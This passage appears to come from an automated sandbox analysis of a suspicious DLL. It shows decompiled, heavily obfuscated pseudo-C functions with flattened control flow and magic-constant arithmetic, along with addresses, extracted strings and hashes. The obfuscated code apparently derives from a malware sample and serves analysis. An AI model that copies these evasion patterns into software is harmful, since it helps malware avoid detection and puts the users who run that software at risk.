				_v84 = _v84 >> 4;
				_v84 = _v84 ^ 0x0438ce96;
				_v100 = 0xb16b;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0x3a2fdb23;
				_v100 = _v100 / _t347;
				_v100 = _v100 ^ 0x02a4abe7;
				_v32 = 0x883d;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00442a4b;
				_v92 = 0xca89;
				_v92 = _v92 << 0xe;
				_v92 = _v92 + 0x8a44;
				_t348 = 0x29;
				_v92 = _v92 / _t348;
				_v92 = _v92 ^ 0x013c4aa7;
				_v52 = 0x404;
				_t349 = 0x6a;
				_v52 = _v52 / _t349;
				_v52 = _v52 + 0xffff84cc;
				_v52 = _v52 ^ 0xffffb1d7;
				_v96 = 0x1382;
				_v96 = _v96 ^ 0xdda77c38;
				_v96 = _v96 << 2;
				_t350 = 0x21;
				_v96 = _v96 / _t350;
				_v96 = _v96 ^ 0x03984523;
				_v28 = 0x72c9;
				_v28 = _v28 + 0xc1ec;
				_v28 = _v28 ^ 0x000116d9;
				_v88 = 0xe360;
				_v88 = _v88 << 1;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0xffffdc99;
				_v88 = _v88 ^ 0x00002bb3;
				_v24 = 0xb27;
				_v24 = _v24 | 0x54af4a27;
				_v24 = _v24 ^ 0x54af70c5;
				_v104 = 0x20e9;
				_v104 = _v104 ^ 0x30957c1a;
				_v104 = _v104 >> 1;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 ^ 0x000644e5;
				_v60 = 0x5e02;
				_v60 = _v60 << 0xc;
				_t351 = 0x6b;
				_t295 = _v4;
				_t357 = _v4;
				_v60 = _v60 * 0x29;
				_v60 = _v60 ^ 0xf0e520c4;
				_v64 = 0x8dff;
				_v64 = _v64 * 0x38;
				_v64 = _v64 + 0x458e;
				_v64 = _v64 ^ 0x001f749b;
				_v40 = 0x5c65;
				_v40 = _v40 / _t351;
				_v40 = _v40 ^ 0x00006d1c;
				_v72 = 0xc60a;
				_v72 = _v72 + 0x70bb;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0x026de662;
				_v76 = 0x47c;
				_v76 = _v76 + 0xffff5521;
				_v76 = _v76 ^ 0xd2a60678;
				_t352 = 0x14;
				_t353 = _v4;
				_v76 = _v76 / _t352;
				_v76 = _v76 ^ 0x02446ded;
				_v44 = 0xfc2b;
				_v44 = _v44 + 0x96d4;
				_v44 = _v44 ^ 0x17589983;
				_v44 = _v44 ^ 0x17594bcd;
				_v48 = 0xed74;
				_v48 = _v48 + 0x9236;
				_v48 = _v48 ^ 0x53004543;
				_v48 = _v48 ^ 0x53013ae9;
				_v56 = 0x1029;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x46c265d9;
				_v56 = _v56 ^ 0x46d24cd9;
				_v68 = 0xb47b;
				_v68 = _v68 + 0x930f;
				_v68 = _v68 | 0xf81d1365;
				_v68 = _v68 ^ 0xf81d57ef;
				while(1) {
					while(1) {
						L2:
						_t361 = _t298 - 0x16ae89bd;
						if(_t361 <= 0) {
							break;
						}
						if(_t298 == 0x1dc5383f) {
							E10002DDF(_v16,  &_v12, _v20, E10019B4A);
							_t298 = 0x3a204f2b;
							goto L25;
						} else {
							if(_t298 == 0x3a204f2b) {
								_t353 = _v48;
								_t342 = _v12;
								_v4 = _t353;
								if(_t342 != 0) {
									do {
										_t289 = E1001232B(_v80, _t342 + 0x1c, _v84);
										_t342 =  *((intOrPtr*)(_t342 + 8));
										_t353 = _t353 + 1 + _t289;
									} while (_t342 != 0);
									_v4 = _t353;
									_t281 = 0x3afc2fec;
								}
								_t298 = 0x16ae89bd;
								goto L19;
							} else {
								if(_t298 != _t281) {
									L25:
									if(_t298 != 0x1813df8a) {
										continue;
									} else {
									}
								} else {
									_t295 = _v56;
									_t343 = _v12;
									if(_t343 != 0) {
										do {
											_t221 =  &_v28; // 0x442a4b
											E100103F1(_v92, _v52, _t343 + 0x1c, _t295 * 2 + _t357, _v96,  *_t221);
											_t293 = E1001232B(_v88, _t343 + 0x1c, _v24);
											_t359 =  &(_t359[5]);
											_t296 = _t295 + _t293;
											_t294 = 0x2c;
											 *((short*)(_t357 + _t296 * 2)) = _t294;
											_t295 = _t296 + 1;
											_t343 =  *((intOrPtr*)(_t343 + 8));
										} while (_t343 != 0);
										_t281 = 0x3afc2fec;
									}
									_t353 = _v4;
									_t298 = 0x18c8122;
									L19:
									_t340 = _v8;
									continue;
								}
							}
						}
						L30:
						return 0 |  *_t340 != 0x00000000;
					}
					if(_t361 == 0) {
						_push(_t298);
						_t357 = E100054FB(_t353 + _t353);
						_t281 = 0x3afc2fec;
						_t298 =  !=  ? 0x3afc2fec : 0x3fa0ed8;
						goto L2;
					} else {
						if(_t298 == 0x18c8122) {
							 *(_t340 + 4) = _v68;
							_t284 = E10007731(_t357, _t340 + 4, _v36, _v104, _v60, _v64, _t295 - 1);
							_t359 =  &(_t359[5]);
							 *_t340 = _t284;
							_t298 = 0xfb62ecd;
							continue;
						} else {
							if(_t298 == 0x3fa0ed8) {
								_t341 = _v12;
								if(_t341 != 0) {
									do {
										_t354 =  *(_t341 + 8);
										E1000DE81(_v76, _t341, _v44);
										_t341 = _t354;
									} while (_t354 != 0);
								}
								_t340 = _v8;
							} else {
								if(_t298 == 0xa757dfd) {
									_t298 = 0x1dc5383f;
									goto L2;
								} else {
									if(_t298 != 0xfb62ecd) {
										goto L25;
									} else {
										E1000DE81(_v40, _t357, _v72);
										_t298 = 0x3fa0ed8;
										while(1) {
											goto L2;
										}
									}
								}
							}
						}
					}
					goto L30;
				}
			}

0x1001c6e0
0x1001c6e4
0x1001c6e6
0x1001c6e8
0x1001c6ec
0x1001c6f1
0x1001c6f6
0x1001c6f9
0x1001c703
0x1001c70b
0x1001c710
0x1001c718
0x1001c726
0x1001c72b
0x1001c731
0x1001c739
0x1001c741
0x1001c749
0x1001c751
0x1001c759
0x1001c765
0x1001c76a
0x1001c774
0x1001c779
0x1001c77f
0x1001c787
0x1001c78f
0x1001c79c
0x1001c79f
0x1001c7a3
0x1001c7a8
0x1001c7b0
0x1001c7b8
0x1001c7bd
0x1001c7cd
0x1001c7d1
0x1001c7d9
0x1001c7e1
0x1001c7e6
0x1001c7ee
0x1001c7f6
0x1001c7fb
0x1001c807
0x1001c80c
0x1001c812
0x1001c81a
0x1001c826
0x1001c829
0x1001c82d
0x1001c835
0x1001c83d
0x1001c845
0x1001c84f
0x1001c85a
0x1001c85f
0x1001c865
0x1001c86d
0x1001c875
0x1001c87d
0x1001c885
0x1001c88d
0x1001c891
0x1001c896
0x1001c89e
0x1001c8a6
0x1001c8ae
0x1001c8b6
0x1001c8be
0x1001c8c6
0x1001c8ce
0x1001c8d2
0x1001c8d7
0x1001c8df
0x1001c8e7
0x1001c8f1
0x1001c8f4
0x1001c8f8
0x1001c8fc
0x1001c900
0x1001c908
0x1001c915
0x1001c919
0x1001c921
0x1001c929
0x1001c939
0x1001c93d
0x1001c945
0x1001c94d
0x1001c955
0x1001c95a
0x1001c962
0x1001c96a
0x1001c972
0x1001c97e
0x1001c981
0x1001c985
0x1001c989
0x1001c991
0x1001c999
0x1001c9a1
0x1001c9a9
0x1001c9b1
0x1001c9b9
0x1001c9c1
0x1001c9c9
0x1001c9d1
0x1001c9d9
0x1001c9de
0x1001c9e6
0x1001c9ee
0x1001c9f6
0x1001c9fe
0x1001ca06
0x1001ca0e
0x1001ca13
0x1001ca13
0x1001ca13
0x1001ca19
0x00000000
0x00000000
0x1001cac8
0x1001cb94
0x1001cb9b
0x00000000
0x1001cace
0x1001cad4
0x1001cb48
0x1001cb4c
0x1001cb50
0x1001cb56
0x1001cb58
0x1001cb63
0x1001cb68
0x1001cb6c
0x1001cb6f
0x1001cb73
0x1001cb77
0x1001cb77
0x1001cb7c
0x00000000
0x1001cad6
0x1001cad8
0x1001cba5
0x1001cbab
0x00000000
0x00000000
0x1001cbb1
0x1001cade
0x1001cade
0x1001cae2
0x1001cae8
0x1001caea
0x1001caea
0x1001cb08
0x1001cb17
0x1001cb1c
0x1001cb1f
0x1001cb23
0x1001cb24
0x1001cb29
0x1001cb2a
0x1001cb2d
0x1001cb31
0x1001cb31
0x1001cb36
0x1001cb3a
0x1001cb3f
0x1001cb3f
0x00000000
0x1001cb3f
0x1001cad8
0x1001cad4
0x1001cbd8
0x1001cbe6
0x1001cbe6
0x1001ca1f
0x1001caa5
0x1001caab
0x1001caad
0x1001caba
0x00000000
0x1001ca21
0x1001ca27
0x1001ca6e
0x1001ca86
0x1001ca8b
0x1001ca8e
0x1001ca90
0x00000000
0x1001ca29
0x1001ca2f
0x1001cbb3
0x1001cbb9
0x1001cbbb
0x1001cbc5
0x1001cbc8
0x1001cbcd
0x1001cbd0
0x1001cbbb
0x1001cbd4
0x1001ca35
0x1001ca3b
0x1001ca60
0x00000000
0x1001ca3d
0x1001ca43
0x00000000
0x1001ca49
0x1001ca53
0x1001ca59
0x1001ca0e
0x00000000
0x1001ca0e
0x1001ca0e
0x1001ca43
0x1001ca3b
0x1001ca2f
0x1001ca27
0x00000000
0x1001ca1f

Strings

, xrefs: 1001C8BE
+O :, xrefs: 1001CACE
e\, xrefs: 1001C929
CE, xrefs: 1001C9C1
`, xrefs: 1001C885
K*D, xrefs: 1001CAEA
J, xrefs: 1001C739
+O :, xrefs: 1001CB9B

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: +O :$+O :$CE$J$K*D$`$e\$
API String ID: 0-1729304812
Opcode ID: 92fbcca86c401ab104d06de8b92f41aa56182d2695fd7e4e63b6faa44943c078
Instruction ID: e60fab708d9d988eef08213445a52dfa82ef4a2ab910b44e7fb891eccf49cd13
Opcode Fuzzy Hash: 92fbcca86c401ab104d06de8b92f41aa56182d2695fd7e4e63b6faa44943c078
Instruction Fuzzy Hash: 8DD162715083459FD359CF25C48980BBBE1FBC4B58F108A0DF6969B260D7B5D98ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 1000C364 Relevance: 10.3, Strings: 8, Instructions: 290
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1000C364() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				unsigned int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _t323;
				short* _t338;
				void* _t343;
				signed int _t347;
				void* _t349;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int* _t398;

				_t398 =  &_v1160;
				_v1044 = 0xb4bf;
				_t349 = 0x14e1bd3d;
				_t347 = 0x32;
				_v1044 = _v1044 / _t347;
				_v1044 = _v1044 ^ 0x000063a2;
				_v1120 = 0x1c18;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0xbedc4282;
				_v1120 = _v1120 ^ 0xbedc611c;
				_v1096 = 0xe102;
				_v1096 = _v1096 | 0x1f52717c;
				_v1096 = _v1096 + 0x31d9;
				_v1096 = _v1096 ^ 0x1f532ca5;
				_v1112 = 0x173b;
				_t389 = 0x5f;
				_v1112 = _v1112 / _t389;
				_v1112 = _v1112 | 0xb3fa1704;
				_v1112 = _v1112 ^ 0xb3fa37e7;
				_v1068 = 0x9869;
				_t387 = 0x69;
				_t390 = 0x53;
				_v1068 = _v1068 * 0x43;
				_v1068 = _v1068 ^ 0x0027b996;
				_v1084 = 0xcfb9;
				_v1084 = _v1084 >> 0xf;
				_v1084 = _v1084 + 0x12c;
				_v1084 = _v1084 ^ 0x000024ff;
				_v1128 = 0x3cd5;
				_v1128 = _v1128 | 0x566ade8e;
				_v1128 = _v1128 >> 9;
				_v1128 = _v1128 + 0xffff5a4b;
				_v1128 = _v1128 ^ 0x002ae40f;
				_v1104 = 0x6c2b;
				_v1104 = _v1104 | 0x9ff8dffb;
				_v1104 = _v1104 ^ 0x9ff8a878;
				_v1056 = 0xffd2;
				_v1056 = _v1056 + 0xffff840f;
				_v1056 = _v1056 ^ 0x0000ebeb;
				_v1152 = 0x1736;
				_v1152 = _v1152 | 0x4cb32822;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0xb8cf;
				_v1152 = _v1152 ^ 0x00bbe158;
				_v1080 = 0x5ef;
				_v1080 = _v1080 + 0xffff8539;
				_v1080 = _v1080 / _t390;
				_v1080 = _v1080 ^ 0x0315a6d4;
				_v1048 = 0xf210;
				_v1048 = _v1048 | 0xcb23d8d0;
				_v1048 = _v1048 ^ 0xcb23a87f;
				_v1144 = 0x90;
				_t391 = 0x31;
				_v1144 = _v1144 / _t391;
				_v1144 = _v1144 + 0xffff80e0;
				_t392 = 0x67;
				_v1144 = _v1144 / _t392;
				_v1144 = _v1144 ^ 0x027c3ad8;
				_v1072 = 0xc5ae;
				_t393 = 0x16;
				_v1072 = _v1072 / _t393;
				_t394 = 0x60;
				_v1072 = _v1072 / _t394;
				_v1072 = _v1072 ^ 0x00006ed7;
				_v1136 = 0xa4ba;
				_v1136 = _v1136 ^ 0xe75bfca7;
				_t395 = 0x7b;
				_v1136 = _v1136 * 0x5c;
				_v1136 = _v1136 ^ 0xe80995ee;
				_v1136 = _v1136 ^ 0xccda384c;
				_v1156 = 0x7c9c;
				_v1156 = _v1156 + 0xffffb410;
				_v1156 = _v1156 + 0xfffffa49;
				_v1156 = _v1156 >> 8;
				_v1156 = _v1156 ^ 0x000056b1;
				_v1160 = 0x84ff;
				_v1160 = _v1160 ^ 0xed45694c;
				_t148 =  &_v1160; // 0xed45694c
				_v1160 =  *_t148 * 0x62;
				_v1160 = _v1160 + 0xffff41d7;
				_v1160 = _v1160 ^ 0xd4c40e06;
				_v1092 = 0x1d87;
				_v1092 = _v1092 << 8;
				_v1092 = _v1092 ^ 0x7d24d215;
				_v1092 = _v1092 ^ 0x7d392b35;
				_v1060 = 0x93f7;
				_v1060 = _v1060 + 0xffff7474;
				_v1060 = _v1060 ^ 0x00001886;
				_v1064 = 0xef31;
				_v1064 = _v1064 >> 0x10;
				_v1064 = _v1064 ^ 0x000047fd;
				_v1148 = 0x11a7;
				_v1148 = _v1148 | 0x5b5dfd11;
				_v1148 = _v1148 << 6;
				_v1148 = _v1148 + 0xffff2c3e;
				_v1148 = _v1148 ^ 0xd77ed371;
				_v1100 = 0x7077;
				_v1100 = _v1100 / _t387;
				_v1100 = _v1100 | 0x4c8a3f77;
				_v1100 = _v1100 ^ 0x4c8a3283;
				_v1140 = 0x668c;
				_v1140 = _v1140 | 0x54be0880;
				_v1140 = _v1140 + 0xd8b3;
				_v1140 = _v1140 / _t395;
				_v1140 = _v1140 ^ 0x00b05f67;
				_v1076 = 0x11c3;
				_v1076 = _v1076 >> 6;
				_v1076 = _v1076 ^ 0x5bd60e39;
				_v1076 = _v1076 ^ 0x5bd63952;
				_v1124 = 0x5174;
				_v1124 = _v1124 * 0x1a;
				_v1124 = _v1124 + 0xffff3f27;
				_t323 = _v1124;
				_t381 = _t323 % _t347;
				_v1124 = _t323 / _t347;
				_v1124 = _v1124 ^ 0x00007b90;
				_v1132 = 0x9c48;
				_v1132 = _v1132 << 2;
				_v1132 = _v1132 ^ 0x5e61e8c2;
				_v1132 = _v1132 ^ 0xca6ca211;
				_v1132 = _v1132 ^ 0x940f5e6e;
				_v1052 = 0xbbfe;
				_v1052 = _v1052 >> 0xc;
				_v1052 = _v1052 ^ 0x00003fa7;
				_v1108 = 0xdf34;
				_v1108 = _v1108 * 0x2f;
				_v1108 = _v1108 + 0xffff7f6f;
				_v1108 = _v1108 ^ 0x0028118b;
				_v1116 = 0x2c66;
				_v1116 = _v1116 >> 2;
				_v1116 = _v1116 ^ 0x28bea5fc;
				_v1116 = _v1116 ^ 0x28beb247;
				_v1088 = 0x89d3;
				_v1088 = _v1088 >> 2;
				_v1088 = _v1088 + 0xa943;
				_v1088 = _v1088 ^ 0x0000f687;
				do {
					while(_t349 != 0x14e1bd3d) {
						if(_t349 == 0x1c504520) {
							E10003B74();
							L9:
							_t349 = 0x363d246c;
							continue;
						}
						if(_t349 == 0x1e34bac7) {
							E1000F4A2(_v1156, _t381, _v1160, _v1092,  &_v1040);
							_push( &_v1040);
							E10007571( &_v1040);
							_t381 = _v1100;
							E1001CBE7( &_v520, _v1100, __eflags, _v1140, _v1076,  &_v1040);
							_t398 =  &(_t398[2]) - 0xc + 0x20;
							_t349 = 0x2b0461c4;
							continue;
						}
						if(_t349 == 0x2b0461c4) {
							_t338 = E1000BDCC( &_v520, _v1124, _v1132, _v1052);
							__eflags = 0;
							 *_t338 = 0;
							_t298 =  &_v1108; // 0x7d392b35
							return E10015183( *_t298, _v1116, _v1088,  &_v520);
						}
						if(_t349 == 0x35103033) {
							_t343 = E1001434E();
							goto L9;
						}
						_t408 = _t349 - 0x363d246c;
						if(_t349 != 0x363d246c) {
							goto L15;
						}
						_push(0x100012d8);
						_push(_v1128);
						_push(_v1084);
						E1000A4D7(_t408, _v1056, _v1152, _v1080, _v1048, E10005DFC(_v1112, _v1068, _t408),  *0x10021088 + 0x254,  &_v520,  *0x10021088 + 0x38);
						_t381 = _v1072;
						_t273 =  &_v1144; // 0x7d392b35
						_t343 = E10010D6D( *_t273, _v1072, _v1136, _t344);
						_t398 =  &(_t398[0xd]);
						_t349 = 0x1e34bac7;
					}
					__eflags =  *((intOrPtr*)( *0x10021088 + 0x244));
					if(__eflags == 0) {
						_t349 = 0x1c504520;
						goto L15;
					}
					_t349 = 0x35103033;
					continue;
					L15:
					__eflags = _t349 - 0xa5a6948;
				} while (__eflags != 0);
				return _t343;
			}

0x1000c364
0x1000c36a
0x1000c378
0x1000c383
0x1000c388
0x1000c391
0x1000c39c
0x1000c3a4
0x1000c3a9
0x1000c3b1
0x1000c3b9
0x1000c3c1
0x1000c3c9
0x1000c3d1
0x1000c3d9
0x1000c3e5
0x1000c3ea
0x1000c3f0
0x1000c3f8
0x1000c400
0x1000c40d
0x1000c410
0x1000c413
0x1000c417
0x1000c41f
0x1000c427
0x1000c42c
0x1000c434
0x1000c43c
0x1000c444
0x1000c44c
0x1000c451
0x1000c459
0x1000c461
0x1000c469
0x1000c471
0x1000c479
0x1000c481
0x1000c489
0x1000c491
0x1000c499
0x1000c4a9
0x1000c4ad
0x1000c4b5
0x1000c4bd
0x1000c4c5
0x1000c4d5
0x1000c4d9
0x1000c4e1
0x1000c4ec
0x1000c4f7
0x1000c502
0x1000c50e
0x1000c511
0x1000c515
0x1000c525
0x1000c52a
0x1000c52e
0x1000c536
0x1000c544
0x1000c549
0x1000c553
0x1000c558
0x1000c55c
0x1000c564
0x1000c56c
0x1000c57b
0x1000c57c
0x1000c580
0x1000c588
0x1000c590
0x1000c598
0x1000c5a0
0x1000c5a8
0x1000c5ad
0x1000c5b5
0x1000c5bd
0x1000c5c5
0x1000c5ca
0x1000c5ce
0x1000c5d6
0x1000c5de
0x1000c5e6
0x1000c5eb
0x1000c5f3
0x1000c5fb
0x1000c603
0x1000c60b
0x1000c613
0x1000c61b
0x1000c620
0x1000c628
0x1000c630
0x1000c638
0x1000c63d
0x1000c645
0x1000c64d
0x1000c65d
0x1000c661
0x1000c669
0x1000c671
0x1000c679
0x1000c681
0x1000c691
0x1000c695
0x1000c69d
0x1000c6a5
0x1000c6aa
0x1000c6b2
0x1000c6ba
0x1000c6c7
0x1000c6cb
0x1000c6d3
0x1000c6d7
0x1000c6d9
0x1000c6dd
0x1000c6e5
0x1000c6f2
0x1000c6fc
0x1000c709
0x1000c711
0x1000c719
0x1000c721
0x1000c726
0x1000c72e
0x1000c73b
0x1000c73f
0x1000c747
0x1000c74f
0x1000c757
0x1000c75c
0x1000c764
0x1000c76c
0x1000c774
0x1000c779
0x1000c781
0x1000c789
0x1000c789
0x1000c797
0x1000c8c1
0x1000c84f
0x1000c84f
0x00000000
0x1000c84f
0x1000c7a3
0x1000c86a
0x1000c885
0x1000c88b
0x1000c8a7
0x1000c8ab
0x1000c8b0
0x1000c8b3
0x00000000
0x1000c8b3
0x1000c7af
0x1000c900
0x1000c905
0x1000c907
0x1000c91a
0x00000000
0x1000c923
0x1000c7b7
0x1000c84a
0x00000000
0x1000c84a
0x1000c7bd
0x1000c7bf
0x00000000
0x00000000
0x1000c7c5
0x1000c7ca
0x1000c7ce
0x1000c818
0x1000c822
0x1000c829
0x1000c82d
0x1000c832
0x1000c835
0x1000c835
0x1000c8cd
0x1000c8d4
0x1000c8dd
0x00000000
0x1000c8dd
0x1000c8d6
0x00000000
0x1000c8df
0x1000c8df
0x1000c8df
0x00000000

Strings

f,, xrefs: 1000C74F
1, xrefs: 1000C613
LiE, xrefs: 1000C5C5
tQ, xrefs: 1000C6BA
wp, xrefs: 1000C64D
5+9}, xrefs: 1000C829
HiZ, xrefs: 1000C8DF
l$=6, xrefs: 1000C704

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$5+9}$HiZ$LiE$f,$l$=6$tQ$wp
API String ID: 0-3332840876
Opcode ID: 19bb0b6492cb6a3327311f079a5428fa02d623af4a76e1f7975982fdda6204cf
Instruction ID: 0560ceacc48df2ff9d847269aa4bb4aee50e7b40195f0fef812aef12fddfdd9c
Opcode Fuzzy Hash: 19bb0b6492cb6a3327311f079a5428fa02d623af4a76e1f7975982fdda6204cf
Instruction Fuzzy Hash: 12E120715093418FE368CF25C58995FBBE1FBC4B58F50891DF2AA862A0D7B58A09CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1001DBC4 Relevance: 10.2, Strings: 8, Instructions: 247
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001DBC4(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t251;
				void* _t256;
				void* _t257;
				void* _t258;
				void* _t263;
				void* _t268;
				void* _t273;
				void* _t275;
				void* _t276;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				intOrPtr _t296;
				void* _t297;
				signed int* _t299;
				void* _t306;

				_t299 =  &_v112;
				_v8 = 0x20016e;
				_t296 = 0;
				_t276 = __ecx;
				_v4 = 0;
				_t297 = 0x341554bf;
				_v52 = 0xc9b1;
				_v52 = _v52 | 0x2e528fe0;
				_t278 = 0xb;
				_v52 = _v52 * 0x55;
				_v52 = _v52 ^ 0x617f5ce2;
				_v100 = 0x134d;
				_v100 = _v100 | 0x49cd1c97;
				_v100 = _v100 << 0x10;
				_v100 = _v100 / _t278;
				_v100 = _v100 ^ 0x02e5e2d4;
				_v24 = 0xae5f;
				_t279 = 0x4b;
				_v24 = _v24 / _t279;
				_v24 = _v24 ^ 0x00004c4a;
				_v112 = 0xcc08;
				_v112 = _v112 << 6;
				_v112 = _v112 | 0x88c75b70;
				_t280 = 0x47;
				_v112 = _v112 * 0x55;
				_v112 = _v112 ^ 0x7a21016f;
				_v64 = 0x9f4b;
				_v64 = _v64 + 0x616b;
				_v64 = _v64 + 0xe20a;
				_v64 = _v64 ^ 0x0001dfd5;
				_v28 = 0x1fae;
				_v28 = _v28 / _t280;
				_v28 = _v28 ^ 0x00004ec5;
				_v104 = 0x5d77;
				_v104 = _v104 + 0x537;
				_v104 = _v104 ^ 0x96a0085a;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0x06af5270;
				_v108 = 0xb68c;
				_v108 = _v108 + 0x2584;
				_v108 = _v108 * 0x34;
				_v108 = _v108 << 3;
				_v108 = _v108 ^ 0x016589aa;
				_v56 = 0x4faa;
				_v56 = _v56 + 0xffff23d2;
				_v56 = _v56 + 0xffff95f1;
				_v56 = _v56 ^ 0xffff6d68;
				_v60 = 0xec8;
				_v60 = _v60 ^ 0x81b41c80;
				_v60 = _v60 | 0x3699af79;
				_v60 = _v60 ^ 0xb7bdea19;
				_v68 = 0x17f7;
				_v68 = _v68 * 0x21;
				_v68 = _v68 << 2;
				_v68 = _v68 ^ 0x000c2d44;
				_v32 = 0xf9f5;
				_v32 = _v32 | 0xd49d42a3;
				_v32 = _v32 ^ 0xd49daf29;
				_v72 = 0xd36d;
				_v72 = _v72 + 0xffffdb20;
				_v72 = _v72 ^ 0x00009306;
				_v76 = 0x522c;
				_t281 = 0x43;
				_v76 = _v76 / _t281;
				_v76 = _v76 * 0x6a;
				_v76 = _v76 ^ 0x0000dde2;
				_v12 = 0x1c43;
				_v12 = _v12 ^ 0xefc0aea8;
				_v12 = _v12 ^ 0xefc08e31;
				_v48 = 0x803b;
				_v48 = _v48 ^ 0x188f99f3;
				_v48 = _v48 ^ 0x134b5df5;
				_v48 = _v48 ^ 0x0bc40f93;
				_v16 = 0xe843;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x000063b5;
				_v92 = 0xef1;
				_v92 = _v92 + 0xffffaf3d;
				_v92 = _v92 + 0xec79;
				_v92 = _v92 * 0x5e;
				_v92 = _v92 ^ 0x003efb8a;
				_v20 = 0xa38a;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00006e81;
				_v96 = 0xdc33;
				_v96 = _v96 | 0xf1642443;
				_v96 = _v96 + 0xffffa62c;
				_v96 = _v96 >> 2;
				_v96 = _v96 ^ 0x3c59759f;
				_v36 = 0x935d;
				_v36 = _v36 ^ 0x8b551063;
				_v36 = _v36 ^ 0x8b558f98;
				_v80 = 0xa58;
				_v80 = _v80 >> 1;
				_v80 = _v80 >> 0xa;
				_v80 = _v80 ^ 0x00006691;
				_v84 = 0x2438;
				_v84 = _v84 | 0x4658edca;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x01219229;
				_v84 = _v84 ^ 0x01218cc4;
				_v88 = 0x580e;
				_v88 = _v88 | 0xb8772654;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x5f1f4a93;
				_v88 = _v88 ^ 0x7fbf3adc;
				_v40 = 0xd338;
				_v40 = _v40 * 0x2d;
				_v40 = _v40 ^ 0xc6aa335d;
				_v40 = _v40 ^ 0xc68f75fb;
				_v44 = 0xf949;
				_v44 = _v44 << 0xd;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0001c255;
				goto L1;
				do {
					while(1) {
						L1:
						_t306 = _t297 - 0x261de027;
						if(_t306 > 0) {
							break;
						}
						if(_t306 == 0) {
							_t258 = E10016B54(_t276, _v52, _v100);
							_t299 =  &(_t299[1]);
							_t297 = 0x13a0f061;
							_t296 = _t296 + _t258;
							continue;
						} else {
							if(_t297 == 0x71bdf61) {
								_t263 = E10012493();
								_t299 = _t299 - 0xc + 0xc;
								_t297 = 0x195a7642;
								_t296 = _t296 + _t263;
								continue;
							} else {
								if(_t297 == 0x13a0f061) {
									_t268 = E10012493();
									_t299 = _t299 - 0xc + 0xc;
									_t297 = 0x71bdf61;
									_t296 = _t296 + _t268;
									continue;
								} else {
									if(_t297 == 0x195a7642) {
										_t273 = E10012493();
										_t299 = _t299 - 0xc + 0xc;
										_t297 = 0x28ce47a5;
										_t296 = _t296 + _t273;
										continue;
									} else {
										if(_t297 == 0x24e4826b) {
											_t275 = E10016B54(_t276 + 0x20, _v36, _v80);
											_t299 =  &(_t299[1]);
											_t297 = 0x262fff8d;
											_t296 = _t296 + _t275;
											continue;
										}
									}
								}
							}
						}
						goto L20;
					}
					if(_t297 == 0x262fff8d) {
						_t251 = E10012493();
						_t299 = _t299 - 0xc + 0xc;
						_t297 = 0x558fb04;
						_t296 = _t296 + _t251;
					} else {
						if(_t297 == 0x28ce47a5) {
							_t256 = E10012493();
							_t299 = _t299 - 0xc + 0xc;
							_t297 = 0x2c38dfc0;
							_t296 = _t296 + _t256;
							goto L1;
						} else {
							if(_t297 == 0x2c38dfc0) {
								_t257 = E10016B54(_t276 + 0x18, _v20, _v96);
								_t299 =  &(_t299[1]);
								_t297 = 0x24e4826b;
								_t296 = _t296 + _t257;
								goto L1;
							} else {
								if(_t297 == 0x341554bf) {
									_t297 = 0x261de027;
									goto L1;
								}
							}
						}
					}
					L20:
				} while (_t297 != 0x558fb04);
				return _t296;
			}

0x1001dbc4
0x1001dbc7
0x1001dbd5
0x1001dbd7
